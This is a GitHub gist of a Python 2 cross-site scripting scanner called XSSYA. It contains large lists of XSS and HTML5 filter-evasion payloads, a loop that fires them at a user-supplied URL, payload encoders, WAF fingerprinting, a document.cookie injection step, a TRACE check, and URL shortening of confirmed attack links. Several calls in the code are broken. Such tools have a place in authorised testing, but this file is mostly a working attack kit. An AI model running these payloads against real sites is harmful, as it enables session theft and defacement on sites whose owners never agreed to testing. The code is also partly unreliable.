Created
March 21, 2015 03:08
-
-
Save tennc/03b55b4c0439f15929e2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: cp1252 -*- | |
# XSSA is a Cross Site Scripting Scanner & Vulnerability Confirmation | |
# By Yehia Mamdouh - twitter.com/@Yehia1mamdouh / Facebook/yehia.mamdouh.98 | |
import urllib2 | |
from urllib2 import Request, build_opener, HTTPCookieProcessor, HTTPHandler | |
import urllib | |
from urllib import FancyURLopener | |
import cookielib | |
import socket | |
import time | |
import base64 | |
import re | |
import sys | |
import httplib | |
import colorama | |
import ssl | |
import gdshortener | |
from functools import partial | |
import custom | |
import string | |
from colorama import Fore, Back, Style | |
from colorama import init | |
colorama.init() | |
###Cross Site Scripting Payloads### | |
xss_attack=[] | |
with open("dict.list","r",encoding="utf-8") as file_paylods: | |
for line in file_paylods.readlines(): | |
xss_attack.append(line) | |
'''xss_attack = ["<script>alert('xssya')</script>", | |
"<script>alert(\"xssya\")</script>", | |
"1<ScRiPt>prompt(999691)</ScRiPt>", | |
"//1<ScRiPt>prompt(919397)</ScRiPt>", | |
"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E", | |
"'\"</scRipt><scRipt>alert('xssya')</scRipt>", | |
"1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E", | |
"<scRiPt>alert(1);</scrIPt>", | |
"\"><scRipt>alert('xssya')</scRipt>", | |
"'';!--\"<XSS>=&{()}", | |
"<q/oncut=alert(1)>", | |
"\";alert(1)//", | |
"%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E", | |
"%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27xss%27)%3C/scRipt%3E", | |
"<scr<script>ipt>alert(1)</scr<script>ipt>", | |
"javascript:alert(1)//", | |
"<scri%00pt>alert(1);</scri%00pt>", | |
"<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>", | |
"%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e", | |
"<img src=\"x:alert\" onerror=\"eval(src%2b'(0)')\">", | |
"data:text/html,%3Cscript%3Ealert(0)%3C/script%3E", | |
"%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit", | |
"%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a", | |
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e", | |
"<iframesrc=\"javascript:alert(2)\">", | |
"%22;alert%28%27XSS%29//", | |
"<IMG %22%22%22><SCRIPT>alert(%22XSS%22)</SCRIPT>%22>", | |
"<w contenteditable id=x onfocus=alert(1)>", | |
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">", | |
"<form action=\"Javascript:alert(1)\"><input type=submit>", | |
"<isindex action=data:text/html, type=image>", | |
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">", | |
"<svg/onload=prompt(1);>", | |
"<marquee/onstart=confirm(2)>/", | |
"<body onload=prompt(1);>", | |
"<q/oncut=open()>", | |
"<a onmouseover=location=?javascript:alert(1)>click", | |
"<svg><script>alert(/1/)</script>", | |
"</script><script>alert(1)</script>", | |
"<scri%00pt>alert(1);</scri%00pt>", | |
"<scri%00pt>confirm(0);</scri%00pt>", | |
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec", | |
"<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>", | |
"<marquee/onstart=confirm(2)>", | |
"<A HREF=\"http://www.google.com./\">XSS</A>", | |
"<svg/onload=prompt(1);>"] | |
''' | |
### HTML5 Payloads ### | |
xss_html5 = ["<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>", | |
"<input onfocus=write(1) autofocus>", | |
"<input onblur=write(1) autofocus><input autofocus>", | |
"<video poster=javascript:alert(1)//></video>", | |
"<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", | |
"<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>", | |
"<video><source onerror=\"alert(1)\">", | |
"<video onerror=\"alert(1)\"><source></source></video>", | |
"<form><button formaction=\"javascript:alert(1)\">X</button>", | |
"<body oninput=alert(1)><input autofocus>", | |
"<math href=\"javascript:alert(1)\">CLICKME</math>", | |
"<link rel=\"import\" href=\"test.svg\" />", | |
"<iframe srcdoc=\"<img src=x:x onerror=alert(1)>\" />", | |
"<picture><source srcset=\"x\"><img onerror=\"alert(1)\"></picture>", | |
"<picture><img srcset=\"x\" onerror=\"alert(1)\"></picture>", | |
"<img srcset=\",,,,,x\" onerror=\"alert(1)\">", | |
"<frameset onload=alert(1)>", | |
"<table background=\"javascript:alert(1)\"></table>", | |
"<!--<img src=\"--><img src=x onerror=alert(1)//\">", | |
"<comment><img src=\"</comment><img src=x onerror=alert(1)//\">", | |
"<style><img src=\"</style><img src=x onerror=alert(1)//\">", | |
"<li style=list-style:url() onerror=alert(1)></li>", | |
"<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", | |
"<head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(1)//", | |
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>", | |
"<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>", | |
"<b <script>alert(1)//</script>0</script></b>", | |
"<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div>", | |
"<script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>", | |
"<img src=\"javascript:alert(2)\"> ", | |
"<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", | |
"<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>", | |
"<img src=\"x` `<script>alert(1)</script>\"` `>", | |
"<img src onerror /\" '\"= alt=alert(1)//\">", | |
"<title onpropertychange=alert(1)></title><title title=></title>", | |
"<!-- `<img/src=xx:xx onerror=alert(1)//--!>", | |
"<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>", | |
"<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>", | |
"<// style=x:expression\28write(1)\29>", | |
"<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>", | |
"<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", | |
"<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", | |
"<script src=\"#\">{alert(1)}</script>;1", | |
"<b><script<b></b><alert(1)</script </b></b>"] | |
###User-Agent### | |
class MyOpener(FancyURLopener): | |
version = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11' | |
myopener = MyOpener() | |
class fake_ssl: | |
wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1) | |
httplib.ssl = fake_ssl | |
class JSHTTPCookieProcessor(urllib2.BaseHandler): | |
handler_order = 400 | |
#Function in case of Vulnerability Confirmation | |
def xxs2(exploi): | |
print "" | |
print Fore.RED + " Testing:",host+exploi | |
try: | |
if xi != 0: | |
handle = urllib2.Handler({'http': 'http://' + '/'}) | |
opene = urllib2.build_opener(host+exploit, handle) | |
sourc = opene.open(host+exploit).read() | |
else: | |
sourc = myopener.open(host+exploi).read() | |
print " Source Length:",len(sourc) | |
##Detecting WAF if Exist | |
if res1.code == 406: | |
print "" | |
print " WAF Detected => (Mod_Security)" | |
elif res1.code == 999: | |
print "" | |
print " WAF Detected => WebKnight" | |
time.sleep(5) | |
elif res1.code == 419: | |
print "" | |
print " WAF Detected => F5 BIG IP" | |
else: | |
print "" | |
print " WAF Not Found" | |
print "" | |
if re.search("xss", sourc.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",host+exploi,"\n" | |
else: | |
print"" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
except(urllib2.HTTPError), msg: | |
print "[-] Error:",msg | |
pass | |
####### Print Menu and Exmaple ######## | |
print Fore.CYAN + "\n" | |
print "\t####################################################################################################" | |
print "\t# #" | |
print "\t# ___ ___ _______. _______.____ ____ ___ ____ ____ ___ ___ #" | |
print "\t# \ \ / / / | / |\ \ / / / \ \ \ / / |__ \ / _ \ #" | |
print "\t# \ V / | (----` | (----` \ \/ / / ^ \ \ \/ / ______ ) | | | | | #" | |
print "\t# > < \ \ \ \ \_ _/ / /_\ \ \ / |______/ / | | | | #" | |
print "\t# / . \ .----) | .----) | | | / _____ \ \ / / /_ __ | |_| | #" | |
print "\t# /__/ \__\ |_______/ |_______/ |__| /__/ \__\ \__/ |____| (__) \___/ #" | |
print "\t# #" #" | |
print "\t# XSSYA (Cross Site Scripting FrameWork) Coded by (@Yehia1mamdouh) Thanks (@Amr_Thabet) #" | |
print "\t# 7dd022053c8a35169305380371a4d577 #" | |
print "\t####################################################################################################" | |
print "" | |
print " XSSYA: Forget Browser And Alert Box " | |
print "" | |
host = raw_input(" Enter A Vulnerable Link: ") | |
res = myopener.open(host) | |
res1= urllib.urlopen(host) | |
html = res.read() | |
links = re.findall('"((http|href)s?://.*?)"', html) | |
print (30 * '-') | |
print (" XSSYA - M E N U") | |
print (30 * '-') | |
print (" 1. XSS Vulnerability Confirmation") | |
print (" 2. Custom XSS Payload") | |
print (" 3. HTML5 Payloads") | |
print (" 4. IP Convert") | |
print (" 5. CVE for XSS") | |
print (" 6. Cross Site Trace") | |
print "" | |
choice = raw_input(' Enter your choice [1-6] : ') | |
print "" | |
print res.info() | |
myfile = res.read() | |
print "" | |
#################### | |
if host[-1:] != "/": | |
print"" | |
print Fore.CYAN + " Load XSSYA" | |
elif host [-1:] != "=": | |
print"" | |
print " Load " | |
elif host [-1:] != "?": | |
print"" | |
print " Load XSSYA" | |
sys.exit(1) | |
### Testing the connection ### | |
try: | |
if sys.argv[3]: | |
xi = sys.argv[3] | |
print "Testing The Connection..." | |
h2 = httplib.ssl(xi) | |
h2.connect() | |
print "[+] xi:",xi | |
except(socket.timeout): | |
print "Connection Timed Out" | |
xi = 0 | |
pass | |
except: | |
print "" | |
xi = 0 | |
pass | |
#HTML5 Payloads# | |
if('3' in choice): | |
settimes = raw_input(" Set Timeout: ") | |
print " Scanning The Host:",host | |
print "" | |
print Fore.RED + " [+] Loaded:",len(xss_html5),"payloads\n" | |
try: | |
for exploi in xss_html5: | |
time.sleep(int (settimes)) | |
xxs2(exploi.replace("\n","")) | |
except KeyboardInterrupt: | |
print "" | |
print "Happy Hunting" | |
#Custom Payload Encode# | |
elif('2' in choice): | |
z = raw_input(" Eenter a Payload: ") | |
print "" | |
payload = z | |
print (" Custom Encode") | |
print "" | |
print (" 1. B64") | |
print (" 2. Hex") | |
print (" 3. URL_encode") | |
print (" 4. HTML Entities") | |
print (" 5. Hex With Semi Coloumns") | |
print (" 6. Non Encode") | |
print "" | |
choose = raw_input(" Choose your Encode ") | |
choose = int(choose) | |
#Encode Payload use of Base64# | |
if choose == 1: | |
print"" | |
encoded = base64.standard_b64encode(payload) | |
print ' ################## B64 String #######################' | |
print '' | |
en1 = host + encoded | |
print en1 | |
if xi != 0: | |
handler = urllib2.Handler({'http': 'http://' + '/'}) | |
opener = urllib2.build_opener(en1, handler) | |
source = opener.open(en1).read() | |
else: | |
source = myopener.open(en1).read() | |
print " Source Length:",len(source) | |
if re.search("xss", source.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",en1,"\n" | |
else: | |
print "" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
mam1 = myopener.open(en1).read() | |
if z in mam1: | |
print "" | |
print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code" | |
print "" | |
else: | |
Fore.GREEN + " [-] False Positive" | |
#Encdoe Payload use of HEX# | |
elif choose == 2: | |
print "" | |
encoded = payload.encode('hex') | |
print ' ################## URL String #######################' | |
print '' | |
en2 = host + encoded | |
print en2 | |
if xi != 0: | |
handler = urllib2.Handler({'http': 'http://' + '/'}) | |
opener = urllib2.build_opener(en2, handler) | |
source = opener.open(en2).read() | |
else: | |
source = myopener.open(en2).read() | |
print " Source Length:",len(source) | |
if re.search("xss", source.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",en2,"\n" | |
else: | |
print "" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
mam1 = myopener.open(en2).read() | |
if z in mam1: | |
print "" | |
print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code" | |
print "" | |
else: | |
print Fore.GREEN + " [-] False Positive" | |
#Encode payload use of URLEncode# | |
elif choose == 3: | |
print"" | |
encoded = urllib2.quote(payload.encode("utf8")) | |
print ' ################## URL String #######################' | |
print '' | |
en3 = host+encoded | |
print en3 | |
if xi != 0: | |
handler = urllib2.Handler({'http': 'http://' + '/'}) | |
opener = urllib2.build_opener(en3, handler) | |
source = opener.open(en3).read() | |
else: | |
source = myopener.open(en3).read() | |
print " Source Length:",len(source) | |
if re.search("xss", source.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",en3,"\n" | |
else: | |
print "" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
mam1 = myopener.open(en3).read() | |
if z in mam1: | |
print "" | |
print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code" | |
print "" | |
else: | |
print Fore.GREEN + " [-] False Positive" | |
#Encode with HexSemi() | |
elif choose == 5: | |
print"" | |
x = '' | |
for i in payload: | |
x += "&#x"+hex(ord(i))[2:]+";" | |
print x | |
print ' ################## Hex With Semi #######################' | |
print '' | |
en55 = host+x | |
print en55 | |
if xi != 0: | |
handler = urllib2.Handler({'http': 'http://' + '/'}) | |
opener = urllib2.build_opener(en55, handler) | |
source = opener.open(en55).read() | |
else: | |
source = myopener.open(en55).read() | |
print " Source Length:",len(source) | |
if re.search("xss", source.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",en55,"\n" | |
else: | |
print "" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
mam1 = myopener.open(en55).read() | |
if z in mam1: | |
print "" | |
print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code" | |
print "" | |
else: | |
print Fore.GREEN + " [-] False Positive" | |
#Encode Payload use of HTML Entities# | |
elif choose == 4: | |
print "" | |
print (" 1. Single & Double Quote") | |
print (" 2. &") | |
print (" 3. ()") | |
print (" 4. all") | |
print "" | |
go = raw_input(" Choose your Encode ") | |
go = int(go) | |
#HTML encode single & Double Quotes# | |
if go == 1: | |
new2 = (payload.replace("'", ''').replace('"', '"')) | |
get1 = host + new2 | |
print get1 | |
if xi != 0: | |
handler = urllib2.Handler({'http': 'http://' + '/'}) | |
opener = urllib2.build_opener(get1, handler) | |
source = opener.open(get1).read() | |
else: | |
source = myopener.open(get1).read() | |
print " Source Length:",len(source) | |
if re.search("xss", source.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",get1,"\n" | |
else: | |
print "" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
mam1 = myopener.open(get1).read() | |
if z in mam1: | |
print "" | |
print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code" | |
print "" | |
else: | |
print Fore.GREEN + " [-] False Positive" | |
#HTML encode of (&)# | |
elif go == 2: | |
new4 = payload.replace('&', '&') | |
get2 = host + new4 | |
print get2 | |
if xi != 0: | |
handler = urllib2.Handler({'http': 'http://' + '/'}) | |
opener = urllib2.build_opener(get2, handler) | |
source = opener.open(get2).read() | |
else: | |
source = myopener.open(get2).read() | |
print " Source Length:",len(source) | |
if re.search("xss", source.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",get2,"\n" | |
else: | |
print "" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
mam1 = myopener.open(get2).read() | |
if z in mam1: | |
print "" | |
print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code" | |
print "" | |
else: | |
print Fore.GREEN + " [-] False Positive" | |
#HTML encode of ()# | |
elif go == 3: | |
new5 = (payload.replace("(", "(").replace(")", ")")) | |
get3 = host + new5 | |
print get3 | |
if xi != 0: | |
handler = urllib2.Handler({'http': 'http://' + '/'}) | |
opener = urllib2.build_opener(get3, handler) | |
source = opener.open(get3).read() | |
else: | |
source = myopener.open(get3).read() | |
print " Source Length:",len(source) | |
if re.search("xss", source.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",get3,"\n" | |
else: | |
print "" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
mam1 = myopener.open(get3).read() | |
if z in mam1: | |
print "" | |
print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code" | |
print "" | |
else: | |
print Fore.GREEN + " [-] False Positive" | |
#HTML encode of <># | |
elif go == 4: | |
nn = (payload.replace("<", "<").replace(">", ">").replace("(", "(").replace(")", ")").replace('"', '"').replace("'", ''')) | |
get4 = host + nn | |
print get4 | |
if xi != 0: | |
handler = urllib2.Handler({'http': 'http://' + '/'}) | |
opener = urllib2.build_opener(get4, handler) | |
source = opener.open(get4).read() | |
else: | |
source = myopener.open(get4).read() | |
print " Source Length:",len(source) | |
if re.search("xss", source.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",get4,"\n" | |
else: | |
print "" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
mam1 = myopener.open(get4).read() | |
if z in mam1: | |
print "" | |
print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code" | |
print "" | |
else: | |
print Fore.GREEN + " [-] False Positive" | |
else: | |
print " Try Again" | |
#NON Encode All# | |
elif choose == 6: | |
print '' | |
en4 = host + payload | |
print en4 | |
if xi != 0: | |
handler = urllib2.Handler({'http': 'http://' + '/'}) | |
opener = urllib2.build_opener(en4, handler) | |
source = opener.open(en4).read() | |
else: | |
source = myopener.open(en4).read() | |
print " Source Length:",len(source) | |
if re.search("xss", source.lower()) != None: | |
print Fore.RED + "\n [!]XSS:",en4,"\n" | |
else: | |
print "" | |
print Fore.GREEN + " [-] Not Vulnerable." | |
mam1 = myopener.open(en4).read() | |
if z in mam1: | |
print "" | |
print Fore.YELLOW + " [+] Confirmed Payload Found in Web Page Code" | |
print "" | |
else: | |
print Fore.GREEN + " [-] False Positive" | |
else: | |
print " Worng choice" | |
#IP Convert# | |
elif('4' in choice): | |
import binascii | |
import socket, struct | |
ip = raw_input(" Enter an IP ") | |
print "" | |
nn = struct.unpack("!I", socket.inet_aton(ip))[0] | |
cc = binascii.hexlify(socket.inet_aton(ip)) | |
dd = binascii.hexlify(socket.inet_aton(ip)).upper() | |
ip = ip.split('.') | |
ff = '.'.join(('0x'+hex(int(i))[2:] for i in ip)) | |
ss = '%04o.%04o.%04o.%04o' % tuple(map(int, ip)) | |
print "###### Converted Addres ######" | |
print "" | |
print Fore.GREEN + " (Hex Lower) " + cc | |
print "" | |
print Fore.GREEN + " (Hex Upper) " + dd | |
print "" | |
print Fore.GREEN + " (HEX Addr) " + ff | |
print "" | |
print Fore.RED + " (Dword Addr) ", nn | |
print "" | |
print Fore.BLUE + " (Octal Addr)", ss | |
sys.exit() | |
### XSS CVE ### | |
elif('5' in choice): | |
from cve import * | |
print (" 1. Apache") | |
print (" 2. WordPress") | |
print (" 3. PHPmyAdmin") | |
print "" | |
Product = raw_input("Select CVE") | |
print "" | |
if ('1' in Product): | |
print Apache() | |
sys.exit() | |
elif('2' in Product): | |
print WordPess() | |
sys.exit() | |
elif('3' in Product): | |
print PHPmyAdmin() | |
sys.exit() | |
else: | |
print "Try Again" | |
###Checking Cross Site Trace (XST)### | |
elif('6' in choice): | |
try: | |
print Fore.RED + " Checking XST...." | |
method = 'TRACE' | |
request = urllib2.Request(host) | |
request.get_method = lambda: method.upper() | |
response = urllib2.urlopen(request) | |
payload = response.read() | |
print(payload) | |
print "Host is Vulnerable " | |
except(urllib2.HTTPError), msg: | |
print "[-] Not Vulnerable (XST) ",msg | |
### Print the result in case of Vulnerable Link Confirmation### | |
else: | |
settimes = raw_input(" Set Timeout: ") | |
print " Scanning The Host:",host | |
print "" | |
print Fore.RED + " [+] Loaded:",len(xss_attack),"payloads\n" | |
try: | |
for exploi in xss_attack: | |
time.sleep(int (settimes)) | |
xxs2(exploi.replace("\n","")) | |
###Confirm by Searching Payload in Web Page### | |
heer = custom.check() | |
bb = " [+] Confirmed Payload Found in Web Page Code" | |
cc = " [-] False Positive" | |
try: | |
mam = myopener.open(host+exploi).read() | |
found = False | |
for payload in heer.hit: | |
if payload in mam: | |
found = True | |
if found: | |
print "" | |
print Fore.YELLOW + bb | |
s = gdshortener.ISGDShortener() | |
short = s.shorten(host+exploi)[0] | |
print "" | |
print Fore.GREEN+ " URL Shortener is", short | |
print "" | |
#Getting COKKIES | |
cj = cookielib.CookieJar() | |
opener = build_opener(HTTPCookieProcessor(cj), HTTPHandler()) | |
xss_cookie = "%3cscript%3ealert(document.cookie)%3c/script%3e" | |
url1 = (host+xss_cookie) | |
req = Request(url1, headers={'User-Agent' : "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30"}) | |
f = opener.open(req) | |
html = f.read() | |
print " Excute document.cookie" | |
time.sleep (3) | |
print "" | |
for cookie in cj: | |
print Fore.CYAN + " ==>", cookie | |
else: | |
print "" | |
print Fore.GREEN + cc | |
except urllib2.HTTPError: | |
print "Error" | |
except KeyboardInterrupt: | |
print "" | |
### Save Wbe Page Code for Manual Check### | |
print "" | |
print "" | |
codehtml = raw_input(" Save Page CODE:? ") | |
sas1 = host + '"><h1>r7hf72hds882js88d2</h1> ' | |
sas = host | |
if ('y' in codehtml): | |
urllib.urlretrieve(sas,'./scan_js.txt') | |
urllib.urlretrieve(sas1,'./scan_html.txt') | |
else: | |
pass | |
###Print Web Page Code in the Screen### | |
print "" | |
codehtml = raw_input(" Print HTML CODE:? ") | |
if ('y' in codehtml): | |
data = urllib2.urlopen(host) | |
print data.info() | |
myfile = data.read() | |
print "" | |
print Fore.WHITE + myfile | |
else: | |
print "" | |
print Fore.CYAN + " Happy Hunting" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
rewrite xssya to add dict 😄
must to download dict.list the xssya.py as same directory
xssya : https://github.com/yehia-mamdouh/XSSYA-V-2.0
dict.list : https://gist.github.com/tennc/4026cfd0925aaad0a655